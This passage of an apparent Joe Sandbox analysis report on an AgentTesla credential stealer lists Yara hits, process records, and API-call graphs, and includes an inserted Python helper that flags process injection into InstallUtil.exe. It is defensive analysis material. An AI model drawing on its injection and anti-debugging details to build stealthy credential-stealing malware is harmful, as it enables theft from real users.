                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3445933830.00000000030DD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3445933830.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3445933830.00000000030B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                      Reputation:moderate
                                                      Has exited:false

                                                      Target ID:18
                                                      Start time:10:31:39
                                                      Start date:13/08/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\watchdog.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Local\Temp\watchdog.exe"
                                                      Imagebase:0x190000
                                                      File size:78'336 bytes
                                                      MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 83%, ReversingLabs
                                                      Reputation:moderate
                                                      Has exited:true

                                                      Target ID:19
                                                      Start time:10:31:39
                                                      Start date:13/08/2024
                                                      Path:C:\Users\user\AppData\Local\Temp\watchdog.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\AppData\Local\Temp\watchdog.exe"
                                                      Imagebase:0xae0000
                                                      File size:78'336 bytes
                                                      MD5 hash:0E362E7005823D0BEC3719B902ED6D62
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:moderate
                                                      Has exited:false
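
                                                      A triage helper for the process entries above, added here as an example; it is not part of the Joe Sandbox report or its tooling. It parses the memory-dump names quoted in the Yara matches and pulls out the two signals a hunter would take from this list: InstallUtil.exe started with no arguments (a .NET binary used as an empty host), and a Yara hit in private RWX memory (protection 00000040) at 0x402000, far outside InstallUtil's own image base of 0xdd0000, which is consistent with the report's process-injection signature. The field layout of the .sdmp name (target id, phase, dump id, base address, page protection, memory type) is inferred from the names on this page and is an assumption; the process records are constructed from the Target ID 16 and 18 entries.

```python
"""Triage of the process list above: parse Joe Sandbox .sdmp dump names and
flag the injection evidence the report records for InstallUtil.exe.

Added example, not part of the Joe Sandbox report or its tooling.
ASSUMPTION: the .sdmp name is laid out as
  target id . phase . dump id . base . page protection . unknown . memory type . unknown . sdmp
inferred from the names on this page (00000010 hex == Target ID 16; 00000040 == RWX).
The records below are CONSTRUCTED from the report's own entries."""

import re
from dataclasses import dataclass, field

SDMP_RE = re.compile(
    r"^(?P<target>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)"
    r"\.(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}"
    r"\.(?P<mem_type>[0-9A-Fa-f]{8})\.[0-9A-Fa-f]{8}\.sdmp$"
)

# winnt.h constants (real values, not assumptions)
PAGE_EXECUTE_READWRITE = 0x40
MEM_PRIVATE = 0x20000
PAGE_SIZE = 0x1000


def parse_sdmp_name(name: str) -> dict:
    """Split a dump-file name into its fields (layout as assumed above)."""
    m = SDMP_RE.match(name)
    if m is None:
        raise ValueError(f"not a Joe Sandbox dump name: {name}")
    return {
        "target_id": int(m["target"], 16),
        "phase": int(m["phase"], 16),
        "dump_id": m["dump_id"],  # opaque identifier, kept as text
        "base": int(m["base"], 16),
        "protect": int(m["protect"], 16),
        "mem_type": int(m["mem_type"], 16),
    }


@dataclass
class Process:
    target_id: int
    path: str
    commandline: str
    imagebase: int
    file_size: int
    yara_sources: list = field(default_factory=list)


def image_span(p: Process) -> range:
    """Rough extent of the process's own mapped image: on-disk size rounded up
    to whole pages (assumption: adequate for a small host like InstallUtil.exe)."""
    pages = -(-p.file_size // PAGE_SIZE)
    return range(p.imagebase, p.imagebase + pages * PAGE_SIZE)


def triage(p: Process) -> list:
    """Return the hunting signals this process exhibits, in a fixed order."""
    findings = []
    exe = p.path.rsplit("\\", 1)[-1].lower()
    if exe == "installutil.exe" and p.commandline.strip() in (p.path, f'"{p.path}"'):
        findings.append("installutil_no_args")  # .NET binary started as an empty host
    if "\\appdata\\local\\temp\\" in p.path.lower():
        findings.append("runs_from_temp")
    span = image_span(p)
    for src in p.yara_sources:
        d = parse_sdmp_name(src)
        if d["target_id"] != p.target_id:
            continue
        # A Yara hit in private RWX memory outside the host's own image is injected
        # code, not the host's .text. Read-write heap hits (decrypted config) are ignored.
        if (d["protect"] == PAGE_EXECUTE_READWRITE and d["mem_type"] == MEM_PRIVATE
                and d["base"] not in span):
            findings.append(f"rwx_private_yara_hit@{d['base']:#x}")
    return findings


# Constructed from the Target ID 16 and 18 entries in the report.
INSTALLUTIL = Process(
    target_id=16,
    path=r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
    commandline=r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"',
    imagebase=0xDD0000,
    file_size=42064,
    yara_sources=[
        "00000010.00000002.3445933830.00000000030DD000.00000004.00000800.00020000.00000000.sdmp",
        "00000010.00000002.3440435201.0000000000402000.00000040.00000400.00020000.00000000.sdmp",
    ],
)
WATCHDOG = Process(
    target_id=18,
    path=r"C:\Users\user\AppData\Local\Temp\watchdog.exe",
    commandline=r'"C:\Users\user\AppData\Local\Temp\watchdog.exe"',
    imagebase=0x190000,
    file_size=78336,
)

if __name__ == "__main__":
    for proc in (INSTALLUTIL, WATCHDOG):
        print(f"Target {proc.target_id}: {triage(proc)}")
```

                                                      The two read-write hits in Target 16 (0x30B5000 and 0x30DD000, protection 00000004) are deliberately not flagged: they are the decrypted AgentTesla strings and configuration sitting in heap memory, useful for extraction but not evidence of injection on their own. The 0x402000 hit, by contrast, is RWX private memory at the default image base of a 32-bit .NET payload and is the region worth dumping and scanning first.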


                                                        Execution Graph

                                                        Execution Coverage:16.8%
                                                        Dynamic/Decrypted Code Coverage:100%
                                                        Signature Coverage:2.2%
                                                        Total number of Nodes:139
                                                        Total number of Limit Nodes:7
                                                        execution_graph (rendered graph omitted; API calls present as graph nodes: GetCurrentProcess, GetCurrentThread, GetCurrentThreadId, DuplicateHandle, CheckRemoteDebuggerPresent, OutputDebugStringW, PostMessageW, DeleteFileW, CreateWindowExW, GetModuleHandleW, LoadLibraryExW, CallWindowProcW)

                                                        Control-flow Graph

                                                        control_flow_graph (rendered graph omitted): basic blocks 9af0a94-9af67b5, with calls from 9af67a8 to 9af7d5f, 9af7d33 and 9af7dc0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7b4e640821fdb1733d65b812ec9c88899a72ec158acd2ea69d099ee0d0351436
                                                        • Instruction ID: 22732a399b99bec0cc16910798792809414c541dbff2cf81e2b098a5b0a4aa0c
                                                        • Opcode Fuzzy Hash: 7b4e640821fdb1733d65b812ec9c88899a72ec158acd2ea69d099ee0d0351436
                                                        • Instruction Fuzzy Hash: 62B3F771A122188FDB68EF79D99466CBBF2FB88700F0084E9D44DA7754DA345E89CF42

                                                        Control-flow Graph

                                                        control_flow_graph (rendered graph omitted): basic blocks 9af0ab8-9af67b5, with calls from 9af67a8 to 9af7d5f, 9af7d33 and 9af7dc0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2401959763.0000000009AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09AF0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9af0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cab89edb164148dd45db8dcbf1f5bc67062c4af955b7a4d018848ed82a0e2812
                                                        • Instruction ID: a1fff5ae6d18f2f74fb1f4d427f110a95dfd25756221fb6cf0e49f6df8a4848d
                                                        • Opcode Fuzzy Hash: cab89edb164148dd45db8dcbf1f5bc67062c4af955b7a4d018848ed82a0e2812
                                                        • Instruction Fuzzy Hash: BEB3F771A122188FDB68EF79D99466CBBF2FB88700F0084E9D44DA7754DA345E89CF42

                                                        Control-flow Graph

                                                        control_flow_graph (rendered graph omitted): basic blocks 9720a38-97261da, with a call to 9727a67
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400561830.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9720000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0a33769bc222575f5f5a9f65b27cee073930c46283bf6851d4ac5beb760b262d
                                                        • Instruction ID: f8fcdd54d5c88db42828421f18570c56c5e7a79e1533b7d2fba04c4aba0b2b55
                                                        • Opcode Fuzzy Hash: 0a33769bc222575f5f5a9f65b27cee073930c46283bf6851d4ac5beb760b262d
                                                        • Instruction Fuzzy Hash: 36B3FA71A11659CBCB68EF39D99466CBBF2FB88700F0085EAD488A7354DE345E89CF41

                                                        Control-flow Graph

                                                        control_flow_graph (rendered graph omitted): basic blocks 51276e1-512b85b, no calls
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2390449421.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5120000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 01f23488becac01926d5e4a4e98742a81c68799958ab89a521c424fc646ec06f
                                                        • Instruction ID: d375f3be4b5eed98bc9773910e3d5cb5df7fd1434e8c2e62361a5637d17127fc
                                                        • Opcode Fuzzy Hash: 01f23488becac01926d5e4a4e98742a81c68799958ab89a521c424fc646ec06f
                                                        • Instruction Fuzzy Hash: 03735670A26619CBD758EF39DD8966EBBB5FB88300F4085A9D048A3344DF34AE94CF51

                                                        Control-flow Graph

                                                        control_flow_graph (rendered graph omitted): basic blocks b2f4066-b2f7805, with calls to b2f449b and b2f6d7c
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2403183172.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b2f0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5ec995228550f4320e9d655f7436b71b0e82b24c10dace330197ac980038a5a0
                                                        • Instruction ID: 650993647c0e08b7945d2596fe1798356a3e399a59eb27e7e3fddf7a7e7213d7
                                                        • Opcode Fuzzy Hash: 5ec995228550f4320e9d655f7436b71b0e82b24c10dace330197ac980038a5a0
                                                        • Instruction Fuzzy Hash: 2A438B70A12219CBCB14FF7AED886ADBBF1FB88710F4085A9D048A7354DE349E94CB55
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2390449421.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5120000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fdc12d167c624ed794e7ae87b129d4c666df740c9a85f2cbd36fb426d40fdd5e
                                                        • Instruction ID: dcff10e4f102f7465acebac5b1e4a59f8cb601a9b4257840f4f0a77f0f8c9878
                                                        • Opcode Fuzzy Hash: fdc12d167c624ed794e7ae87b129d4c666df740c9a85f2cbd36fb426d40fdd5e
                                                        • Instruction Fuzzy Hash: 4E135874A00626DFCB60DFB8CA84BADB7B5FB88704F508655C509E7B48DB38EA50CB54
                                                        APIs
                                                        • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 051275DF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2390449421.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5120000_image.jbxd
                                                        Similarity
                                                        • API ID: CheckDebuggerPresentRemote
                                                        • String ID:
                                                        • API String ID: 3662101638-0
                                                        • Opcode ID: 2933d1d5368b2b58b681a497c95b7b38bfe5019a7fb56d54a435dc96249e15af
                                                        • Instruction ID: 504916e77b0095dc3739e9bc6fd8d4c0ff1f914670daac15fa840461294ca23a
                                                        • Opcode Fuzzy Hash: 2933d1d5368b2b58b681a497c95b7b38bfe5019a7fb56d54a435dc96249e15af
                                                        • Instruction Fuzzy Hash: F721287180025A8FDB10CF9AD884BEEFBF4EF49310F14845AE455A7250D778A944CFA5
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e5bd55019969880f43f6a6cee46efb1c41e445820baf5e21477eb1154bf14071
                                                        • Instruction ID: 7b18fc8ae6bb34486c745a728041c9343f1868efd22f20992addf658005a788b
                                                        • Opcode Fuzzy Hash: e5bd55019969880f43f6a6cee46efb1c41e445820baf5e21477eb1154bf14071
                                                        • Instruction Fuzzy Hash: FC829270A002199FDB19DF69C894AAEBBB6FFC8304F158559E505EB3A9DB30DC42CB50
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2377510500.0000000001130000.00000040.00000800.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_1130000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e6cfbc9ab69aea821d267d173511a23b5da9a27ab250489eaf528e2a398ce639
                                                        • Instruction ID: 0ed1a67a77fa6bc470409d8c01ad8c4b5f4f3dd74982f1f528df9305b2208276
                                                        • Opcode Fuzzy Hash: e6cfbc9ab69aea821d267d173511a23b5da9a27ab250489eaf528e2a398ce639
                                                        • Instruction Fuzzy Hash: C8826131A00515CFCB19CF68D984AAEBBF2FF88314F158659F509AB269D730ED41CB61
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2403183172.000000000B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B2F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_b2f0000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0e11eef9e377862a9b833ec10b493b121cd7bb58f799dd63089556bc2b222aa5
                                                        • Instruction ID: 8b246fc6627cb0c1ea0f49fdc06e9f1924793ab724ed3d6259da950bcd9d7d3e
                                                        • Opcode Fuzzy Hash: 0e11eef9e377862a9b833ec10b493b121cd7bb58f799dd63089556bc2b222aa5
                                                        • Instruction Fuzzy Hash: 2D42FE31E013458FC709EFB9D884A6EBBF2FF89200F1585AAD049EB351EE349945CB91
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400340221.0000000009700000.00000040.00000800.00020000.00000000.sdmp, Offset: 09700000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9700000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e3812e57667bf9ee8da7ae3252e85b365fb80b7ea62d09c78f2630f15bce3111
                                                        • Instruction ID: b5e78c8d816fd2c38d063c29ff95f3ca0845b8bb787492f557fb37dc7b75fbe9
                                                        • Opcode Fuzzy Hash: e3812e57667bf9ee8da7ae3252e85b365fb80b7ea62d09c78f2630f15bce3111
                                                        • Instruction Fuzzy Hash: 1A524C34A00746CFDB14DF28C844B99B7F2EF85314F2582A9D5586F3A2DB71A986CF81
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400340221.0000000009700000.00000040.00000800.00020000.00000000.sdmp, Offset: 09700000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9700000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: da51205ca0e4d009b1bb6db8ed65cefcb0a19167468c0487fc37509d7fceeb02
                                                        • Instruction ID: 9ee089e18af6e35c78799ab6d2cfafb2da226acc854144ff2e5396c33b7c1258
                                                        • Opcode Fuzzy Hash: da51205ca0e4d009b1bb6db8ed65cefcb0a19167468c0487fc37509d7fceeb02
                                                        • Instruction Fuzzy Hash: 8B525C34A00746CFDB14DF28C844B99B7B2FF85314F2582A9D5586F3A2DB71A986CF81
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400561830.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9720000_image.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 68ba0ba8277e19e06e112251b719230c7dbc3276f2df1e75d5931bf58a2343f0
                                                        • Instruction ID: 25ce4e458bb9019db4177c8fcb04bca7c0083f1b243100befd2709e4da8280d3
                                                        • Opcode Fuzzy Hash: 68ba0ba8277e19e06e112251b719230c7dbc3276f2df1e75d5931bf58a2343f0
                                                        • Instruction Fuzzy Hash: B181C575F002288FDB18EB7998542BE7BB3BFC8B00B15851DE046E7389CE369C018796

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 098AA816
                                                        • GetCurrentThread.KERNEL32 ref: 098AA853
                                                        • GetCurrentProcess.KERNEL32 ref: 098AA890
                                                        • GetCurrentThreadId.KERNEL32 ref: 098AA8E9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: 8149b6d0f8d21869fe5b841068c96a32e0d2041ca24cd2ad070db3dad241541e
                                                        • Instruction ID: d27541d0485cb3da3faea426b0b8e4e1ff3807efe691a699f689c0fe2c5843da
                                                        • Opcode Fuzzy Hash: 8149b6d0f8d21869fe5b841068c96a32e0d2041ca24cd2ad070db3dad241541e
                                                        • Instruction Fuzzy Hash: 915158B090060ACFEB04CFA9D648BDEBBF1EF88314F208059E519A7360D7399945CF69

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32 ref: 098AA816
                                                        • GetCurrentThread.KERNEL32 ref: 098AA853
                                                        • GetCurrentProcess.KERNEL32 ref: 098AA890
                                                        • GetCurrentThreadId.KERNEL32 ref: 098AA8E9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID: Current$ProcessThread
                                                        • String ID:
                                                        • API String ID: 2063062207-0
                                                        • Opcode ID: bdc58d302ce25739af294a48ddab85847f5163918ec8491b601f7481e68b3007
                                                        • Instruction ID: b60ccfb3c27be645b8bddd9f475d920421a4a6d744cbc99225c2988ba6ef4d1c
                                                        • Opcode Fuzzy Hash: bdc58d302ce25739af294a48ddab85847f5163918ec8491b601f7481e68b3007
                                                        • Instruction Fuzzy Hash: 625148B0900609CFEB14CFA9D548BDEBBF5EF88314F208059E419A7360D7395945CF69

                                                        Control-flow Graph

                                                        control_flow_graph 6064 98a87f0-98a87ff 6065 98a882b-98a882f 6064->6065 6066 98a8801-98a880e call 98a77b4 6064->6066 6067 98a8843-98a8884 6065->6067 6068 98a8831-98a883b 6065->6068 6071 98a8810 6066->6071 6072 98a8824 6066->6072 6075 98a8891-98a889f 6067->6075 6076 98a8886-98a888e 6067->6076 6068->6067 6123 98a8816 call 98a8a88 6071->6123 6124 98a8816 call 98a8a78 6071->6124 6072->6065 6078 98a88c3-98a88c5 6075->6078 6079 98a88a1-98a88a6 6075->6079 6076->6075 6077 98a881c-98a881e 6077->6072 6083 98a8960-98a89dd 6077->6083 6082 98a88c8-98a88cf 6078->6082 6080 98a88a8-98a88af call 98a77c0 6079->6080 6081 98a88b1 6079->6081 6084 98a88b3-98a88c1 6080->6084 6081->6084 6086 98a88dc-98a88e3 6082->6086 6087 98a88d1-98a88d9 6082->6087 6114 98a89df-98a89ee 6083->6114 6115 98a89f0-98a8a20 6083->6115 6084->6082 6089 98a88f0-98a88f9 call 98a77d0 6086->6089 6090 98a88e5-98a88ed 6086->6090 6087->6086 6095 98a88fb-98a8903 6089->6095 6096 98a8906-98a890b 6089->6096 6090->6089 6095->6096 6098 98a8929-98a892d 6096->6098 6099 98a890d-98a8914 6096->6099 6121 98a8930 call 98a8d88 6098->6121 6122 98a8930 call 98a8d78 6098->6122 6099->6098 6100 98a8916-98a8926 call 98a83dc call 98a83ec 6099->6100 6100->6098 6101 98a8933-98a8936 6105 98a8938-98a8956 6101->6105 6106 98a8959-98a895f 6101->6106 6105->6106 6114->6115 6116 98a8a28-98a8a53 GetModuleHandleW 6115->6116 6117 98a8a22-98a8a25 6115->6117 6118 98a8a5c-98a8a70 6116->6118 6119 98a8a55-98a8a5b 6116->6119 6117->6116 6119->6118 6121->6101 6122->6101 6123->6077 6124->6077
                                                        APIs
                                                        • GetModuleHandleW.KERNELBASE(00000000), ref: 098A8A46
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID: HandleModule
                                                        • String ID:
                                                        • API String ID: 4139908857-0
                                                        • Opcode ID: 107ff034ad299682a75f2277faa12f0492054b2c068fa0aa668a5410d7d9a6c0
                                                        • Instruction ID: 6fc1ab1a43544fb423d4d3ed2cb2183217240cf3e4346b09e6e28de856cea77d
                                                        • Opcode Fuzzy Hash: 107ff034ad299682a75f2277faa12f0492054b2c068fa0aa668a5410d7d9a6c0
                                                        • Instruction Fuzzy Hash: C7814470A00B058FEB24DF2AD44575ABBF1BF88314F00892DE59AD7B50DB74E845CBA1

                                                        Control-flow Graph

                                                        control_flow_graph 6125 98aee04-98aee76 6126 98aee78-98aee7e 6125->6126 6127 98aee81-98aee88 6125->6127 6126->6127 6128 98aee8a-98aee90 6127->6128 6129 98aee93-98aeecb 6127->6129 6128->6129 6130 98aeed3-98aef32 CreateWindowExW 6129->6130 6131 98aef3b-98aef73 6130->6131 6132 98aef34-98aef3a 6130->6132 6136 98aef80 6131->6136 6137 98aef75-98aef78 6131->6137 6132->6131 6138 98aef81 6136->6138 6137->6136 6138->6138
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 098AEF22
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: cc61a8b9f485f95470295c8f168691f190fa69d09867d4b3d5a4a316e0fa1cd4
                                                        • Instruction ID: 0f0223afffda1a27f2b349da0a9aea7c74c6b2d2a5f7f54190ab23ff1931e249
                                                        • Opcode Fuzzy Hash: cc61a8b9f485f95470295c8f168691f190fa69d09867d4b3d5a4a316e0fa1cd4
                                                        • Instruction Fuzzy Hash: 7851BFB1D003499FEB14CF9AD984ADEBBB5FF48310F64852AE818AB211D7749845CF90

                                                        Control-flow Graph

                                                        control_flow_graph 6139 98aee10-98aee76 6140 98aee78-98aee7e 6139->6140 6141 98aee81-98aee88 6139->6141 6140->6141 6142 98aee8a-98aee90 6141->6142 6143 98aee93-98aef32 CreateWindowExW 6141->6143 6142->6143 6145 98aef3b-98aef73 6143->6145 6146 98aef34-98aef3a 6143->6146 6150 98aef80 6145->6150 6151 98aef75-98aef78 6145->6151 6146->6145 6152 98aef81 6150->6152 6151->6150 6152->6152
                                                        APIs
                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 098AEF22
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400944034.00000000098A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 098A0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_98a0000_image.jbxd
                                                        Similarity
                                                        • API ID: CreateWindow
                                                        • String ID:
                                                        • API String ID: 716092398-0
                                                        • Opcode ID: f65a7f15c2d7adea3cad064620b51d9faa3449d665572a03cda827442b50db2f
                                                        • Instruction ID: 6d4837b3aa6073c0b9d0021be84637e9a96965e591e1c2e900951996e67dad48
                                                        • Opcode Fuzzy Hash: f65a7f15c2d7adea3cad064620b51d9faa3449d665572a03cda827442b50db2f
                                                        • Instruction Fuzzy Hash: 0F41AEB1D003499FEB14CF9AD884ADEBBB5FF48310F64852AE818AB351D775A845CF90

                                                        Control-flow Graph

                                                        control_flow_graph 6153 97286ff-972870a 6154 9728752-9728756 6153->6154 6155 972870c-972871d 6153->6155 6156 972871f-9728750 6154->6156 6157 9728757-9728782 6154->6157 6155->6156 6156->6154 6159 9728784-9728787 6157->6159 6160 972878a-97287b5 DeleteFileW 6157->6160 6159->6160 6161 97287b7-97287bd 6160->6161 6162 97287be-97287e6 6160->6162 6161->6162
                                                        APIs
                                                        • DeleteFileW.KERNELBASE(00000000), ref: 097287A8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2400561830.0000000009720000.00000040.00000800.00020000.00000000.sdmp, Offset: 09720000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_9720000_image.jbxd
                                                        Similarity
                                                        • API ID: DeleteFile
                                                        • String ID:
                                                        • API String ID: 4033686569-0
                                                        • Opcode ID: ddac701140d62de4f10aa53724c1318d46f18b17124d5e1ad05c9ce45df8ad83
                                                        • Instruction ID: 8d9bae3137a81bdcdb9ef6a750e0cb1fbe3c3b0997cc0c6c83ef144b039c91a2
                                                        • Opcode Fuzzy Hash: ddac701140d62de4f10aa53724c1318d46f18b17124d5e1ad05c9ce45df8ad83
                                                        • Instruction Fuzzy Hash: 8031C1B6C097958FCB02DFA5C8102D9BFB0AF46210F1A41DBC494EB293D3385905CBA2
                                                        APIs
                                                        • CallWindowProcW.USER32(?,?,?,?,?), ref: 0512F571
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2390449421.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5120000_image.jbxd
                                                        Similarity
                                                        • API ID: CallProcWindow
                                                        • String ID:
                                                        • API String ID: 2714655100-0
                                                        • Opcode ID: d50ab3bc0a34fc4635f3e40211d0f82461b84bed141a41da0a3706242c30a937
                                                        • Instruction ID: b5790a0e149af9e82543f7c27aa7a13ee00a8f9658ac4002fe5e072015573cb9
                                                        • Opcode Fuzzy Hash: d50ab3bc0a34fc4635f3e40211d0f82461b84bed141a41da0a3706242c30a937
                                                        • Instruction Fuzzy Hash: 11411AB590021ACFDB14CF99C489AAABBF5FB88314F24C45DD519AB361D734A852CFA0
                                                        APIs
                                                        • CheckRemoteDebuggerPresent.KERNELBASE(?,?), ref: 051275DF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2390449421.0000000005120000.00000040.00000800.00020000.00000000.sdmp, Offset: 05120000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_5120000_image.jbxd
                                                        Similarity
                                                        • API ID: CheckDebuggerPresentRemote
                                                        • String ID:
                                                        • API String ID: 3662101638-0
                                                        • Opcode ID: 1d29e0a26dc9641429ac9d37f6af65f0c4de77061126e53a0dc8ef9132d54c55
                                                        • Instruction ID: 65707aa8aeaf41b15f56cbc4d95368d09c98bceee7f4ec8b243db24072f3d958
                                                        • Opcode Fuzzy Hash: 1d29e0a26dc9641429ac9d37f6af65f0c4de77061126e53a0dc8ef9132d54c55
